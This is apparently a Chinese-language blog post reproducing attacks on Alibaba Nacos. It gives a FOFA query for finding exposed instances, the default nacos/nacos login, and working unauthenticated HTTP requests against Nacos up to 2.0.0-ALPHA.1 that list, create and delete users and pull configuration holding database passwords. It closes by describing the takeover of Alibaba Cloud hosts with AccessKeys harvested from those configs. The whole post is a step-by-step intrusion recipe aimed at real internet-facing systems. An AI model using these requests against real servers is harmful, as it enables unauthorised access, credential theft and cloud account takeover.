从Nacos漏洞到接管阿里云主机

1 概述

Nacos是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和微服务平台。

一共复现2个漏洞:Nacos默认口令和权限认证绕过/未授权访问。

思路:通过默认口令或权限认证绕过登录系统,从配置中找到AccessKeyID和AccessKeSecret,利用相关工具接管阿里云主机服务器。

FoFa语法:title="Nacos"

2 详情

2.1 控制台默认口令/弱口令

Nacos的Web界面如下。

看到界面首先想到的就是试下默认口令nacos/nacos。

2.2 权限认证绕过/未授权访问

Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

受影响版本:Nacos <= 2.0.0-ALPHA.1

漏洞POC:直接访问如下链接

http://www.xxx.com/nacos/v1/auth/users?pageNo=1&pageSize=1

新建用户

http://www.xxx.com/nacos/v1/auth/users

POST /nacos/v1/auth/users HTTP/1.1

username=test1&password=test11

看到网上好多文章都说要加上User-Agent请求头,修改UA头为Nacos-Server,但在测试之后发现好像不是必要的,没有请求头同样可以创建用户。

同样可以使用命令进行删除用户。

DELETE /nacos/v1/auth/users HTTP/1.1

username=test2

 

查看配置信息,可获取数据库账户密码

http://www.xxx.com/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=dev&search=accurate

2.3 接管阿里云主机

登录之后可以在配置中查找下敏感信息,比如这次就遇到了阿里云的AccessKey,从而可以接管阿里云主机。

利用相关工具直接进行接管主机服务器。

posted @ 2022-07-16 20:41  NoId1  阅读(3209)  评论(0编辑  收藏  举报